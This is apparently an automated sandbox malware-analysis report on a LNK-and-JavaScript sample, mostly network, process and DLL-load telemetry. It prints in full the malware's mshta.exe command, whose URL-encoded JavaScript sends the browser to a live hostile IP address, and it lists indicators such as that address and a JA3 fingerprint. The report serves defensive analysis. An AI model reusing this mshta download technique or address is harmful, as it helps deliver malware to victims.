Source: Submited Sample |
Integrated Neural Analysis Model: Matched 84.2% probability |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49723 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49724 version: TLS 1.2 |
Source: Joe Sandbox View |
JA3 fingerprint: 82dc2ea333123943700c0f6b3022789a |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 102.165.46.145 |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 102.165.46.145Connection: Keep-Alive |
Source: mshta.exe, 00000001.00000002.2322453260.000001412703D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.2297663983.00000141270A3000.00000004.00000020.00020000.00000000.sdmp, {DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat.4.dr, ~DF3A347E01C7E1A4F8.TMP.4.dr |
String found in binary or memory: https://102.165.46.145/ |
Source: mshta.exe, 00000001.00000002.2322453260.000001412707E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/-; |
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/2288 |
Source: mshta.exe, 00000001.00000002.2322453260.000001412702C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://102.165.46.145/n |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49723 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 102.165.46.145:443 -> 192.168.2.6:49724 version: TLS 1.2 |
Source: DocumentoRserva30513[1].zip.7.dr |
Zip Entry: reserva/Donejoao.js |
Source: classification engine |
Classification label: mal56.winLNK@8/10@0/1 |
Source: unknown |
Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();" |
|
Source: unknown |
Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding |
|
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2 |
|
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new |
|
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2 |
|
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17410 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6228 CREDAT:17414 /prefetch:2 |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Process created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: jscript9.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ieframe.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ieproxy.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d2d1.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d10warp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: vcruntime140.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: msvcp140.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: mshta.exe, 00000001.00000002.2322453260.0000014127059000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |